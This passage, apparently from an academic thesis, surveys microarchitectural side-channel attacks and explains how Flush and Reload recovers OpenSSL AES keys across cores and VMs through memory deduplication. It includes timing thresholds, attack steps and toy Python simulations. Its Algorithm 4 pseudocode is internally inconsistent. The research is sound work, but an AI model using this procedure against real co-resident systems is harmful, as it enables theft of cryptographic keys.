In 2014, Yarom et al. [YF14] implemented, for the first time, the Flush and Reload attack across cores/VMs to recover sensitive information, aided by memory deduplication mechanisms. The attack was applied to the GnuPG implementation of RSA. With this work the Flush and Reload attack became popular, and more scenarios in which it could be applied arose. For instance, Benger et al. [BvdPSY14] presented the Flush and Reload attack on the ECDSA implementation of OpenSSL. In the same year, Irazoqui et al. [IIES14b] applied Flush and Reload to recover AES encryption keys across VMs. This attack was implemented on VMware platforms to show the strength of the attack in virtualized environments. Shortly after, Zhang et al. [ZJRR14] showed the applicability of the Flush and Reload attack to verify co-location in PaaS clouds and to obtain the number of items in a co-resident user's shopping cart. In 2015, Irazoqui et al. [IIES15] showed that it is possible to recover sensitive data from incorrectly CBC-padded TLS packets. In the same year, Gruss et al. [GSM15] presented an automated way to catch LLC cache patterns applying the Flush and Reload method and consequently detect key strokes pressed by the victim. Eventually, hypervisor providers disabled the deduplication feature on their platforms to prevent Flush and Reload attacks. Therefore, there was a need to find a new way to target the LLC. Concurrently, Irazoqui et al. [IES15a] and Liu et al. [Fan15] described how to apply the Prime and Probe attack to the LLC on deduplication-free systems. While Irazoqui et al.
[IES15a] applied the method to recover the OpenSSL AES last round key in VMware and Xen hypervisors, Liu et al. [Fan15] demonstrated how to recover an El Gamal decryption key from the recent GnuPG implementation. In 2016, Inci et al. [IGI+16b] showed that commercial clouds are not immune to these attacks and applied the same technique in the commercial Amazon EC2 cloud to recover a 2048-bit RSA key from the Libgcrypt implementation. Moreover, Oren et al. [OKSK15] presented the feasibility of implementing cache attacks through JavaScript execution to profile incognito browsing. In the same year, Lipp et al. [LGS+16] applied three different methods (Prime and Probe, Flush and Reload and Evict and Reload) to attack the ARM processors typically used in mobile devices. The success of the work showed that it is possible to implement cache attacks on mobile platforms.

3.2.7 Cache Internals

With novel and more complex cache designs, which include many undocumented features, it became increasingly difficult to obtain the knowledge necessary to use the cache as a covert channel. Aiming at correctly characterizing the usage of the caches as an attack vector, researchers started investigating their designs. An example of these features are the LLC slices, selected by an undocumented hash function in Intel processors. In 2015, the first LLC slice reverse engineering was performed by Irazoqui et al. [IES15b], utilizing timing information to recover the slice selection algorithms of a total of 6 different Intel processors. Later, Maurice et al. [MSN+15] presented a more efficient method using performance counters to recover the slice selection algorithm. Later, Inci et al. [IGI+16b] and Yarom et al. [YGL+15] again utilized timing information to recover non-linear slice selection algorithms. Finally, in 2016, Yarom et al. [YGH16] exploited cache-bank conflicts on Intel Sandy Bridge processors.
The study shows that the cache banks in the L1 cache can be used to recover an RSA key if hyper-threading is enabled on the core.

3.2.8 Cache Pre-Fetching

Pre-fetching is a commonly used method in computer architecture to provide better performance when accessing instructions or data from local memory. It consists of predicting the utilization of a cache line and fetching it into the cache prior to its utilization. In 2014, Liu et al. [LL14] suggested that previous architectural countermeasures do not provide sufficient protection against the demand-fetch policy of shared caches. Thus, to prevent pre-fetching attacks they propose a randomization policy for the LLC in which a cache miss is not sent directly to the CPU; instead, randomized fetches are performed in the neighborhood of the missing memory line. In 2015, Rebeiro et al. [RM15] presented an analysis of sequential and arbitrary-stride pre-fetching on cache timing attacks. They conclude that ciphers with smaller tables leak more than ciphers with large tables due to data pre-fetching. In 2016, Gruss et al. [GMF+16] utilized pre-fetching instructions to obtain address information, defeating SMAP, SMEP and kernel ASLR.

3.2.9 Other Attacks on Caches

Other attacks have exploited different characteristics of a process rather than execution time and cache accesses. In 2010, Kong et al. [KJC+10] presented a thermal attack on the I-cache by checking the cache thermal sensors. They showed that dynamic thermal management (DTM) is not sufficient to prevent thermal attacks if the malicious code targets a specific section of the I-cache. In 2015, Masti et al. [MRR+15] expanded the previous work to multi-core platforms. They used core temperature as a side channel to communicate with other processes. In the same year, Riviere et al. [RNR+15] targeted the I-cache with electromagnetic fault injection (EMFI) on the control flow.
They showed that fault injection is straightforward to apply against cryptographic libraries even if they have countermeasures against fault attacks. In 2016, researchers focused on Spin-Transfer Torque RAM (STTRAM), a promising technology for cache applications. Rathi et al. [RDNG16] proposed three new techniques to handle the magnetic field and temperature of the processor. The new techniques are stalling, cache bypass and check-pointing to establish data security, and the resulting performance degradation is measured with the SPLASH benchmark suite. In the same year, Rathi et al. [RNG16] exploited the read/write current and latency of the STTRAM architecture to establish a side channel inside the LLC.

3.2.10 Memory Bus Locking Attacks

So far it has been shown how an attacker can create contention at different cache hierarchy levels to retrieve secret information from a co-resident user. Memory bus locking attacks are different in this sense, since they do not have the ability to recover fine-grain information. Yet, they can be utilized to perform a different set of malicious actions, or as a pre-step to the execution of more powerful side channel attacks.

When two different threads located in different cores operate on the same shared variable, the value of the shared variable retrieved by each thread might be different, since modifications might only be performed in core-private caches. This is called a data race. In order to solve this, atomic operations operate on shared variables in such a way that no other thread can see the modification half-complete. For that purpose, atomic operations usually utilize lock prefixes to ensure the particular shared variable in the cache hierarchy is locked until one of the threads has finished updating the value. The lock instructions work well when the data to be locked fits into a single cache line.
However, if the data to be locked spans more than one cache line, modern CPUs cannot issue two lock instructions on separate cache lines at the same time [IGES16]. Instead, modern CPUs adopt the solution of flushing any memory operation from the pipeline, incurring several overheads that can be exploited by malicious users. In fact, there are several examples of malicious usage of memory bus locking overheads. For instance, Varadarajan et al. [VZRS15], Xu et al. [XWW15] and Inci et al. [IGES16] utilized this mechanism to detect co-residency in IaaS clouds by observing the performance degradation of HTTP queries to the victim. Finally, Inci et al. [IIES16] and Zhang et al. [ZZL17] utilized memory bus locking effects as a Quality of Service (QoS) degradation mechanism in IaaS clouds.

3.2.11 DRAM and Rowhammer Attacks

The DRAM, often also called the main memory, is the hardware component in charge of providing memory pages to executing programs. There are two major attacks targeting the DRAM: the rowhammer attack and the DRAMA side channel attack. Since both attacks utilize different concepts and have different goals, we proceed to explain them separately.

The DRAM is usually divided into several categories, i.e., channels (physical links between the DRAM and the memory controller), Dual Inline Memory Modules (DIMMs, physical memory modules attached to each channel), ranks (back and front of a DIMM), banks (analogous to cache sets) and rows (analogous to cache lines). Two addresses are physically adjacent if they share the same channel, DIMM, rank and bank. Additionally, each bank contains a row buffer that holds the most recently accessed row. DRAMA side channel attacks take advantage of the fact that serving a DRAM access from the row buffer is faster than a row buffer miss. Thus, similar to what is observed in cache attacks, an attacker can create collisions in a bank's row buffer to infer information about a co-resident victim.
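The channel/DIMM/rank/bank/row decomposition above can be illustrated with a toy address model. The bit layout below is purely hypothetical (real memory controllers use undocumented, often XOR-based mappings); it only illustrates when two physical addresses contend for the same row buffer, which is the adjacency notion DRAMA relies on:

```python
# Toy model of DRAM address decomposition. Field positions are
# assumptions for illustration, not a real Intel/DDR mapping.
from collections import namedtuple

DramLoc = namedtuple("DramLoc", "channel dimm rank bank row")

def decompose(phys_addr: int) -> DramLoc:
    """Split a physical address into hypothetical DRAM coordinates."""
    channel = (phys_addr >> 6) & 0x1   # 1 bit  -> 2 channels
    dimm    = (phys_addr >> 7) & 0x1   # 1 bit  -> 2 DIMMs per channel
    rank    = (phys_addr >> 8) & 0x1   # 1 bit  -> front/back of DIMM
    bank    = (phys_addr >> 9) & 0x7   # 3 bits -> 8 banks
    row     = phys_addr >> 16          # remaining bits select the row
    return DramLoc(channel, dimm, rank, bank, row)

def same_bank(a: int, b: int) -> bool:
    """True if both addresses compete for the same row buffer."""
    la, lb = decompose(a), decompose(b)
    return la[:4] == lb[:4]  # channel, dimm, rank and bank all equal
```

Two addresses for which `same_bank` holds but whose rows differ will evict each other from the row buffer, producing the measurable timing difference that the side channel exploits.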
The rowhammer attack takes advantage of the influence that accesses to a row in a particular bank of the DRAM have on adjacent rows of the same bank. In fact, continuous accesses can increase the charge leak rate of adjacent rows. Typically, DRAM has a refresh rate (at which cell values are refreshed) to avoid the complete charge leak of cells in a DRAM row. However, if the charge leak rate is faster than the refresh rate, then some cells completely lose their charge before their value can be refreshed, resulting in bit flips. These bit flips can be particularly dangerous if adjacent rows contain security critical information. The rowhammer attack has been exploited more than the DRAMA side channel attack. In fact, since it was discovered [KDK+14a], rowhammer has been shown to be executable from a JavaScript extension [GMM16], on mobile devices [vdVFL+16], and even from an IaaS VM to break the isolation provided by the hypervisor [XZZT16]. Further, it has been shown that it can be utilized as a mechanism to inject faults into cryptographic keys that can lead to their full exposure [BM16].

3.2.12 TEE Attacks

Trusted Execution Environments (TEEs) are designed with the goal of executing processes securely in isolated environments, even in the presence of powerful adversaries such as a malicious Operating System. In order to achieve this goal, TEEs usually work, among other measures, with encrypted DRAM memory pages. However, TEEs still utilize the same hardware components as untrusted execution environments, and thus most of the microarchitectural attacks explained above are still applicable to processes executed inside a TEE. Examples of TEEs are the well known Intel SGX [Sch16] and the ARM TrustZone [ARM09].

Perhaps the distinguishing factor when discussing the applicability of microarchitectural attacks to TEEs is the DRAM memory encryption. While TEE DRAM memory pages are indeed encrypted, this data is decrypted when placed in the cache hierarchy for faster access by the CPU.
This implies that any of the cache hierarchy attacks discussed above is still applicable against TEE environments, as nothing stops an attacker from creating cache contention and obtaining decrypted TEE information. More than that, a malicious OS can schedule processes in any way it wants, interrupt the victim process every few cycles, or prevent it from using side-channel-free hardware resources (e.g. AES-NI [TNM11]). Thus, compared to the low resolution that microarchitectural attackers obtain under a commercial OS, a malicious OS obtains a much higher resolution, as it can observe every single memory access made by the victim.

A similar issue is experienced with BPU microarchitectural attacks. BPU attacks were largely dismissed due to their core co-residency limitation (BPUs are core-private resources) and their low access distinguishability. However, the whole picture changes when a malicious OS comes into play. Once again, a malicious OS is in control of the scheduling of the processes being executed in the system. Thus, it controls where and when each process executes, i.e., it can schedule malicious processes on the same core as the victim process. The situation becomes even more dangerous when special instructions are available to the OS to better control the outcome of the branches executed [LSG+16].

Although DRAM row access and memory bus locking attacks have not yet been shown to be applicable in the TEE scenario, the theoretical characteristics of these attacks suggest that both will soon be demonstrated to be applicable in TEEs. In fact, there is no solid theoretical argument that suggests TEEs would prevent memory bus locking attacks. As for the DRAM access attacks, our assumption is that applicability will depend on how the DRAM rows are placed in the row buffer. If these are placed unencrypted, then the attack would be equally viable.
Rowhammer, on the contrary, is assumed to be defeated by the memory authentication and integrity mechanisms utilized by TEEs.

3.2.13 Cross-core/-CPU Attacks

Multiple microarchitectural attacks have been reviewed in the previous paragraphs, but it has not been discussed how their applicability has improved over the years. In fact, microarchitectural attacks have steadily gained practicality since they were first implemented in 2005. Indeed, the first microarchitectural attacks (i.e. those targeting the L1 and the BPU) were largely dismissed for several years, as they were only applicable if victim and attacker shared the same CPU core. In a world of multi-core systems, this restriction seemed to be the main limitation preventing microarchitectural attacks from being considered a threat.

It was in 2013 when the first cross-core cache attack was presented, even though it required that victim and attacker share memory pages. Later this requirement would be eliminated, making cross-core cache attacks applicable in almost every system. However, there was a requirement that microarchitectural attacks had not yet met, i.e., to be applicable even when victim and attacker share the underlying hardware but are located in different CPU sockets.

Cross-CPU applicability would later be accomplished by cache coherency protocol attacks, rowhammer, DRAMA and memory bus locking attacks. Indeed, all of them target resources that are shared not only by every core, but further by every CPU socket in the system. As explained in the previous paragraphs, the first targets the cache coherence protocol characteristics, the next two target the DRAM characteristics, while the last targets the memory bus characteristics. In short, microarchitectural attacks have experienced a huge increase in popularity in recent years, especially due to their improved characteristics and applicability.
While they were largely dismissed at the beginning for being applicable only to core-private resources, current microarchitectural attacks are applicable even across CPU sockets.

Chapter 4

The Flush and Reload attack

Until 2013, microarchitectural attacks had been largely disregarded by the community, mainly due to their lack of applicability in real world scenarios. In particular, they suffered from the following limitations:

•Microarchitectural attacks were only shown to be successful on core-private resources, like the L1 caches and the BPUs. With the wide adoption of multi-core systems, the restriction of having to be located on the same core as the victim is a huge obstacle to the applicability of microarchitectural attacks.

•Core-private resources usually exhibit low resolution for executing microarchitectural attacks. For instance, L1 and L2 accesses only differ by a few cycles. BPU mispredictions are also hardly distinguishable, as their penalties have been heavily optimized. Therefore, core-private resources are less likely to withstand the amount of noise typically observed in real world scenarios.

•Before 2013, microarchitectural attacks lacked real world scenarios in which they could be applied, as they usually demanded a highly controlled environment.

In order to increase the applicability of microarchitectural attacks it is necessary to investigate and discover new covert channels that can be exploited across cores and that are resistant to the amount of noise typical of modern usage environments. The only work prior to ours that investigated cross-core covert channels is [YF14], in which an RSA key is recovered through the Last Level Cache (LLC). This chapter expands on [YF14], demonstrating that LLC attacks can recover a wider range of information in a number of scenarios. The first attack that we discuss is the Flush and Reload attack, first applied to the L1 in [GBK11], which acquired its name in [YF14].
The Flush and Reload attack utilizes the LLC as the covert channel to recover information and, prior to this work, was only shown to be applicable across processes being executed in the same OS. In this chapter we demonstrate how such an attack can be utilized to recover fine-grain information from a co-resident VM placed on a different core. In particular,

•We demonstrate that Flush and Reload can recover information from co-resident VMs in hypervisors as popular as VMware.

•We expand on the capabilities of Flush and Reload by recovering an AES key in less than a minute.

•We show that microarchitectural attacks can be applied against high level protocols by recovering TLS session messages.

4.1 Flush and Reload Requirements

We cannot start discussing the functionality of the Flush and Reload attack without first mentioning the requirements that are needed to successfully apply it. In particular, the Flush and Reload attack has four very important pre-requisites that have to be met in the targeted system for it to succeed:

•Shared memory with the victim: The Flush and Reload attack assumes that attacker and victim share at least the targeted memory blocks in the system, i.e., both access the same physical memory address. Although this requirement might seem difficult to achieve, we discuss in Section 4.2 the scenarios in which memory sharing approaches are implemented.

•CPU socket co-residency: The Flush and Reload attack is only applicable if attacker and victim co-reside in the same CPU socket, as the LLC is only shared across cores and not across CPU sockets. Note that, unlike prior microarchitectural attacks, core co-residency is not necessary.

•Inclusive LLC: The Flush and Reload attack requires the inclusiveness property in the LLC. This, as we will see in Section 4.4.1, is necessary to be able to manipulate memory blocks in the upper level caches. The vast majority of Intel processors feature an inclusive LLC.
However, as we will see in Section 5, similar technical procedures can exploit non-inclusive caches through cache coherence covert channels.

•Access to a flushing instruction: The Flush and Reload attack requires a specific instruction in the Instruction Set Architecture (ISA) capable of forcing memory blocks to be removed from the entire cache hierarchy. In x86-64 systems, this is provided through the clflush instruction.

Without any of these four requirements the Flush and Reload attack is not able to successfully recover data from a victim. Two of them can be assumed to be easily achievable in Intel processors, as they feature inclusive LLCs and the clflush instruction is accessible from userspace. CPU socket co-residency should also be easily accomplished, as modern computers do not usually feature more than two CPU sockets. However, the shared memory requirement might be harder to achieve. In the following section we describe mechanisms under which different processes/users share the same physical memory.

4.2 Memory Deduplication

Although the idea of different processes/users sharing the same physical memory might seem threatening, the truth is that we encounter mechanisms that permit it in popular OSs and hypervisors. In particular, all Linux OSs implement the so-called Kernel Samepage Merging (KSM) mechanism, which merges duplicate read-only memory pages belonging to different processes. Consequently KVM, a Linux-based hypervisor, features the same mechanism across different VMs. Furthermore, VMware implements Transparent Page Sharing (TPS), a mechanism similar to KSM that also allows different VMs to share memory. Even though the deduplication optimization saves memory and thus allows more virtual machines to run on the host system, it also opens a door to side channel attacks.
While the data in the cache cannot be modified or corrupted by an adversary, parallel access rights can be exploited to reveal secret information about processes executed in the target VM. We will focus on the Linux implementation of the Kernel Samepage Merging (KSM) memory deduplication feature and on the TPS mechanism implemented by VMware. We describe in detail the functionality of KSM, but the same procedure is implemented by TPS.

KSM is the Linux memory deduplication implementation that first appeared in Linux kernel version 2.6.32 [Jon10, KSM]. In this implementation, the KSM kernel daemon, ksmd, scans the user memory for potential pages to be shared among users [AEW09]. Since scanning the whole memory continuously would be CPU intensive and time consuming, KSM instead scans only the potential candidates and creates signatures for these pages. These signatures are kept in the deduplication table. When two or more pages with the same signature are found, they are cross-checked completely to determine if they are identical. To create signatures, KSM scans the memory at 20 msec intervals and at best scans only 25% of the potential memory pages at a time. This is why any memory disclosure attack, including ours, has to wait for a certain time before the deduplication takes effect, upon which the attack can be performed. In our case, it usually took around 30 minutes to share up to 32000 pages.

Figure 4.1: Memory Deduplication Feature

During the memory search, KSM analyzes three types of memory pages [SIYA12]:

•Volatile Pages: Pages whose contents change frequently and that should not be considered as candidates for memory sharing.

•Unshared Pages: Candidate pages for deduplication. Through the madvise system call, they are advertised to ksmd as likely candidates for merging.

•Shared Pages: Deduplicated pages that are shared between users or processes.
When a duplicate page signature is found among candidates and the contents are cross-checked, ksmd automatically tags one of the duplicate pages with a copy-on-write (COW) tag and shares it between the processes/users, while the other copy is eliminated. Experimental implementations [KSM] show that using this method it is possible to run over 50 Windows XP VMs with 1GB of RAM each on a physical machine with just 16GB of RAM. As a result, the power consumption and system cost are significantly reduced for systems with multiple users.

Figure 4.2: Copy-on-Write Scheme

4.3 Flush and Reload Functionality

We described the pre-requisites that the system in which the Flush and Reload attack will be applied needs to fulfill. If they are satisfied, and assuming victim and attacker share a memory block b, the Flush and Reload attack can be applied by performing the following steps:

Flushing stage: In this stage, the attacker uses the clflush instruction to flush b from the cache, hence making sure that it has to be retrieved from main memory the next time it needs to be accessed. We have to remark here that the clflush instruction does not only flush the memory block from the cache hierarchy of the corresponding working core; it is flushed from the caches of all the cores due to the LLC inclusiveness property. This is an important point: if it only flushed the corresponding core's caches, the attack would only work if the attacker's and victim's processes were co-residing on the same core. This would have required a much stronger assumption than just being on the same physical machine.

Target accessing stage: In this stage the attacker waits until the target runs a fragment of code which might use the memory block b that has been flushed in the first stage.

Reloading stage: In this stage the attacker reloads the previously flushed memory block b and measures the time it takes to reload.
We perform this with the popular (and userspace accessible) rdtsc instruction, which reads the hardware cycle counter. Before reading the cycle counter we issue memory barrier instructions (mfence and lfence) to make sure all load and store operations have finished before reading the memory block b. Depending on the reload time, the attacker decides whether the victim accessed the memory block (in which case the memory block will be present in the cache) or not (in which case the memory block will be fetched from memory).

The timing difference between a cache hit and a cache miss makes the aforementioned access easily detectable by the attacker. In fact, this is one of the big advantages of targeting the LLC as a covert channel.

Figure 4.3: Reload time in hardware cycles when a co-located VM uses the memory block b (red, LLC accesses) and when it does not use the targeted memory block b (blue, memory accesses) using KVM on an Intel XEON 2670

Figure 4.3 shows the reload times of a memory block being retrieved from the LLC and from the memory, represented as red and blue histograms respectively. We observe that LLC accesses utilizing the Flush and Reload technique usually take around 70 cycles, while memory accesses usually take around 200 cycles. Thus, an attacker using the Flush and Reload technique can easily distinguish when a victim uses a shared memory block.

Flush and Reload memory targets: As we explained, Flush and Reload targets memory blocks that are shared between victim and attacker, and mechanisms like KSM can help make this happen. However, this also means that Flush and Reload can only target very specific memory blocks, as KSM only shares read-only memory pages.
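The reload-time decision above amounts to a simple threshold test. The following Python sketch simulates only that decision logic; the probe itself (clflush, the timed access, and rdtsc with fences) is hardware-bound and is not shown. The synthetic samples are drawn around the ~70 and ~200 cycle figures reported above, and the 130-cycle threshold is an assumed value, not a measurement:

```python
# Simulated Flush+Reload decision stage. Real reload timings would come
# from rdtsc around a memory access; here we draw synthetic samples
# around the ~70-cycle (LLC hit) and ~200-cycle (DRAM) modes above.
import random

THRESHOLD = 130  # cycles; an assumed value between the two modes

def victim_accessed(reload_cycles: int) -> bool:
    """A fast reload means the victim touched the shared block b."""
    return reload_cycles < THRESHOLD

random.seed(1)
hits   = [random.gauss(70, 10) for _ in range(1000)]   # block was in the LLC
misses = [random.gauss(200, 20) for _ in range(1000)]  # block came from DRAM

hit_rate  = sum(victim_accessed(int(t)) for t in hits) / len(hits)
miss_rate = sum(not victim_accessed(int(t)) for t in misses) / len(misses)
```

With the two timing modes this well separated, the classifier is essentially error-free, which is why a single empirically chosen threshold suffices in practice.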
Functions and data declared globally usually belong to the kind of memory that an attacker can target with Flush and Reload. However, dynamically allocated data, as it is modifiable, cannot be targeted by Flush and Reload. Thus, an attacker needs to pick the application to attack carefully, taking this consideration into account.

4.4 Flush and Reload Attacking AES

AES has been one of the main targets of cache attacks. For instance, Bernstein demonstrated that table entries in different cache lines can have different L1 access times, while Osvik et al. applied the Evict and Time and the Prime and Probe attacks to the L1 cache. In this section we will describe the principles of our Flush and Reload attack on the C implementation of AES in OpenSSL. In [GBK11], Gullasch et al. described a Flush and Reload attack on the AES implementation of the OpenSSL library. However, in this study we are going to use the Flush and Reload method with some modifications that, from our point of view, have clear advantages over [GBK11]. We consider two scenarios: the attack as a spy process running in the same OS instance as the victim (as done in [GBK11]), and the attack running as a cross-VM attack in a virtualized environment.

4.4.1 Description of the Attack

As in prior Flush and Reload attacks, we assume that the adversary can monitor accesses to a given cache line. However, unlike the attack in [GBK11], this attack

•only requires the monitoring of a single memory block; and

•flushing can be done before encryption and reloading after encryption, i.e. the adversary does not need to interfere with or interrupt the attacked process.

More concretely, the Linux kernel features a completely fair scheduler which tries to evenly distribute CPU time among processes. Gullasch et al. [GBK11] exploited the Completely Fair Scheduler (CFS) [CFS] by overloading the CPU while a victim AES encryption process is running.
They managed to gain control over the CPU and suspend the AES process, thereby gaining an opportunity to monitor the cache accesses of the victim process. Our attack is agnostic to CFS and does not require time consuming overloading steps to gain access to the cache.

We assume the adversary monitors accesses to a single line of one of the T tables of an AES implementation, preferably a T table that is used in the last round of AES. Without loss of generality, let's assume the adversary monitors the memory block corresponding to the first positions of table T, where T is the lookup table applied to the targeted state byte si, and si is the i-th byte of the AES state before the last round. Let's also assume that a cache line can hold n T table values, e.g., the first n T table positions in our case. If si is equal to one of the indices of the monitored T table entries in the memory block (i.e. si ∈ {0,...,n−1} if the memory block contains the first n T table entries) then the monitored memory block will, with very high probability, be present in the cache (since it has been accessed by the encryption process). However, if si takes a different value, the monitored memory block is not loaded in this step. Nevertheless, since each T table is accessed l times (for AES-128 in OpenSSL, l = 40 per Tj), there is still a probability that the memory block was loaded by any of the other accesses.

In both cases, all that happens after the T table lookup is a possible reordering of bytes (due to AES's Shift Rows), followed by the last round key addition. Since the last round key is always the same, for si the n values are mapped to n specific and constant ciphertext byte values. This means that for n out of 256 ciphertext values the monitored memory block will always have been loaded by the AES operation, while for the remaining 256−n values the probability of it having been reloaded is smaller.
In fact, the probability that the specific T table memory block i has not been accessed by the encryption process is given as:

Pr[no access to T[i]] = (1 − t/256)^l

Here, l is the number of accesses to the specific T table. For OpenSSL 1.0.1 AES-128 we have l = 40. If we assume that each memory block can hold t = 16 entries per cache line, we have Pr[no access to T[i]] = 7.6%. However, if the T tables start in the middle of a cache line, an attacker can be smart enough to target those memory blocks for which t = 8 and Pr[no access to T[i]] = 28.6%. Therefore it is easily distinguishable whether the memory block is accessed or not. Indeed, this turns out to be the case, as confirmed by our experiments.

In order to distinguish the two cases, all that is necessary is to measure the timing of the reload of the targeted memory block. If the line was accessed by the AES encryption, the reload is quick; otherwise it takes more time. Based on a threshold that we will choose empirically from our measurements, we expect to distinguish main memory accesses from L3 cache accesses. For each possible value of the ciphertext byte ci we count how often either case occurs. Now, for n ciphertext values (the ones corresponding to the monitored T table memory block) the memory block has always been reloaded by AES, i.e. the reload counter is (close to) zero. These n ciphertext values are related to the state as follows:

ci = ki ⊕ T[s[i]] (4.1)

where s[i] can take n consecutive values. Note that Eq. (4.1) describes the last round of AES. The brackets in the index of the state byte s[i] indicate the reordering due to the Shift Rows operation. For the other values of ci, the reload counter is significantly higher. Given the n values of ci with a low reload counter, we can solve Eq. (4.1) for the key byte ki, since the indices s[i] as well as the table output values T[s[i]] are known for the monitored memory block. In fact, we get n possible key candidates for each ci with a zero reload counter.
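The no-access probability derived above is easy to check numerically; a minimal sketch (the function name is ours):

```python
# Probability that the monitored T-table memory block is *not* touched
# during one encryption: Pr = (1 - t/256)^l, where t is the number of
# table entries in the block and l the number of accesses to the table.
def p_no_access(t: int, l: int = 40) -> float:
    return (1 - t / 256) ** l

p16 = p_no_access(16)  # block holds 16 entries -> about 7.6%
p8  = p_no_access(8)   # block holds 8 entries  -> about 28%
```

The smaller the block (t = 8 instead of t = 16), the higher the no-access probability, which is exactly why targeting a half-populated cache line gives the attacker a stronger signal.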
The correct key is the only one that all n valid values for ci have in common. A general description of the key recovery algorithm is given in Algorithm 4, where key byte number 0 is recovered from the ciphertext values corresponding to the n low reload counter values recovered from the measurements. Again, n is the number of T table positions that a cache line holds. The reload vector Xi = [x(0), x(1), ..., x(255)] holds the reload counter values x(j) for each ciphertext value ci = j. Finally, K0 is the vector that, for each key byte candidate k, tracks the number of appearances in the key recovery step.

Algorithm 4 Recovery algorithm for key byte k0
Input: X0 // Reload vector for ciphertext byte 0
Output: k0 // Correct key byte 0
forall xj ∈ X0 do
  if xj < AccessThreshold then // Threshold for values with low reload counter
    Addcounter(Ti, Xi); // Increase counter of Xi using Ti
  end
end
return X0, X1, ..., X15

The above attack can be repeated on each byte by simply analyzing the collected ciphertexts and their timings for each of the ciphertext bytes individually. As before, the timings are profiled according to the value that each ciphertext byte ci takes in each of the encryptions, and are stored in a ciphertext byte vector. The attack process is described in Algorithm 5. In a nutshell, the algorithm monitors the first T table memory block of all used tables and hence stores four reload values per observed ciphertext. Note that this is a known-ciphertext attack, and therefore all that is needed is a flush of one memory block before each encryption. There is no need for the attacker to gain access to plaintexts. Finally, the attacker should apply Algorithm 4 to each of the obtained ciphertext reload vectors. Recall that each ciphertext reload vector uses a different T table, so the corresponding T table should be applied in the key recovery algorithm.

Performing the Attack. In the following we provide the details of the process followed during the attack.
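The key-recovery reasoning above can be illustrated with a toy simulation. The table below is a random byte permutation standing in for a real T table (which actually maps bytes to 32-bit words), and the noisy reload counters are replaced by the exact set of ciphertext values guaranteed to reload fast; both simplifications are ours, but the candidate-intersection logic is the one described in the text:

```python
# Toy simulation of the last-round key-byte recovery. The relation
# c = k XOR T[s] from Eq. (4.1) is kept; everything else is simplified.
import random

random.seed(0)
T = list(range(256))
random.shuffle(T)          # stand-in bijective "T table"
n = 16                     # T-table entries held by the monitored line
k_true = 0x42              # last-round key byte to be recovered

# Ciphertext values with a (near-)zero reload counter: those reachable
# from the monitored block, i.e. c = k XOR T[s] for s in 0..n-1.
low_counter = {k_true ^ T[s] for s in range(n)}

# Recovery: each low-counter c yields n key candidates c XOR T[s];
# the true key byte is the one common to all candidate sets.
candidates = None
for c in low_counter:
    cand = {c ^ T[s] for s in range(n)}
    candidates = cand if candidates is None else candidates & cand
```

A wrong key byte survives the intersection only if XOR-ing by its difference from the true key permutes the monitored n-entry set onto itself, which is overwhelmingly unlikely for a random table; the intersection therefore collapses to the single correct byte.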
Step 1: Acquire information about the offset of the T tables. The attacker has to know the offset of the T tables with respect to the beginning of the library. With that information, the attacker can refer and point to any memory block that holds T table values even when ASLR is activated. This means that some reverse engineering work has to be done prior to the attack. This can be done in a debugging step in which the offsets of the addresses of the four T tables are recovered.

Step 2: Collect measurements. In this step, the attacker requests encryptions and applies Flush and Reload between consecutive encryptions. The information gained, i.e. whether T_i[0] was accessed or not, is stored together with the observed ciphertext. The attacker needs to observe several encryptions to get rid of the noise and to be able to recover the key. Note that, while the reload step must be performed and timed by the attacker, the flush might be performed by other processes running in the victim OS.

Step 3: Key recovery. In this final step, the attacker uses the collected measurements and his knowledge of the public T tables to recover the key. From this information, the attacker applies the steps detailed in Section 7.4.2.1 to recover the individual bytes of the key.

4.4.3 Attack Scenario 1: Spy Process

In this first scenario we attack an encryption server running in the same OS as the spy process. The encryption server receives encryption requests, encrypts a plaintext and sends the ciphertext back to the client. The server and the client are running on different cores. Thus, the attack consists in distinguishing accesses to the LLC, i.e. the L3 cache, which is shared across cores, from accesses to main memory. Clearly, if the attacker is able to distinguish accesses between the LLC and main memory, it will also be able to distinguish between L1 and main memory accesses whenever server and client co-reside on the same core. In this scenario, both the attacker and the victim are using the same shared library.
KSM is responsible for merging those pages into one unified shared page. Therefore, the victim and attacker processes are linked through the KSM deduplication feature. Our attack works as described in the previous section. First the attacker discovers the offsets of the addresses of the T tables with respect to the beginning of the library. Next, it issues encryption requests to the server and receives the corresponding ciphertexts. After each encryption, the attacker checks with the Flush and Reload technique whether the chosen T table values have been accessed. Once enough measurements have been acquired, the key recovery step is performed. As we will see in our results section, the whole process takes less than half a minute.

Our attack significantly improves on previous cache side channel attacks such as evict+time or prime and probe [OST06]. Both attacks were based on spy processes targeting the L1 cache. A clear advantage of our attack is that, since it targets the shared last level cache, it works across cores. A more realistic attack scenario was proposed earlier by Bernstein [Ber04], where the attacker targets an encryption server. Our attack similarly works under a realistic scenario. However, unlike Bernstein's attack [Ber04], our attack does not require a profiling phase that involves access to an identical implementation with a known key. Finally, with respect to the previous Flush and Reload attack on AES, our attack does not need to interrupt the AES execution of the encryption server. We compare the different attacks according to the number of encryptions needed in Section 4.4.6.

4.4.4 Attack Scenario 2: Cross-VM Attack

In our second scenario the victim process is running in one virtual machine and the attacker in another one, but on the same physical server, possibly on different cores. For the purposes of this study it is assumed that the co-location problem has been solved using the methods proposed in [RTSS09].
The attack exploits memory overcommitment features that some hypervisors such as VMware provide. In particular, we focus on memory deduplication. The hypervisor periodically searches for identical pages across VMs and merges them into a single page in memory. Once this is done (without any intervention by the attacker), both the victim and the attacker access the same portion of physical memory, enabling the attack. The attack process is the same as in Scenario 1. Moreover, we later show that the key is recovered in less than a minute, which makes the attack practical.

In the previous scenario we discussed the improvements of our attack over earlier proposals, except for the most important one: we believe that the evict+time, prime and probe, and time collision attacks would be rather difficult to carry out in a real cloud environment. The first two, as we know them so far, target the L1 cache, which is not shared across cores. The attacker would have to be on the same core as the victim, which is a much stronger assumption than merely being on the same physical machine. Finally, targeting the CFS [GBK11] to evict the victim process requires the attacker's code to run in the same OS, which will certainly not be possible in a virtualized environment.

4.4.5 Experiment Setup and Results

We present results for both a spy process within the native machine and the cross-VM scenario. The target process is executed in Ubuntu 12.04 64-bit, kernel version 3.4, using the C implementation of AES in OpenSSL 1.0.1f for encryption. This is used when OpenSSL is configured with the no-asm and no-hw options. We want to remark that this is not the default option in the installation of OpenSSL in most products. All experiments were performed on a machine featuring an Intel i5-3320M four core clocked at 3.2GHz. The Core i5 has a three-level cache architecture: the L1 cache is 8-way associative, with a size of 2^15 bytes and a cache line size of 64 bytes.
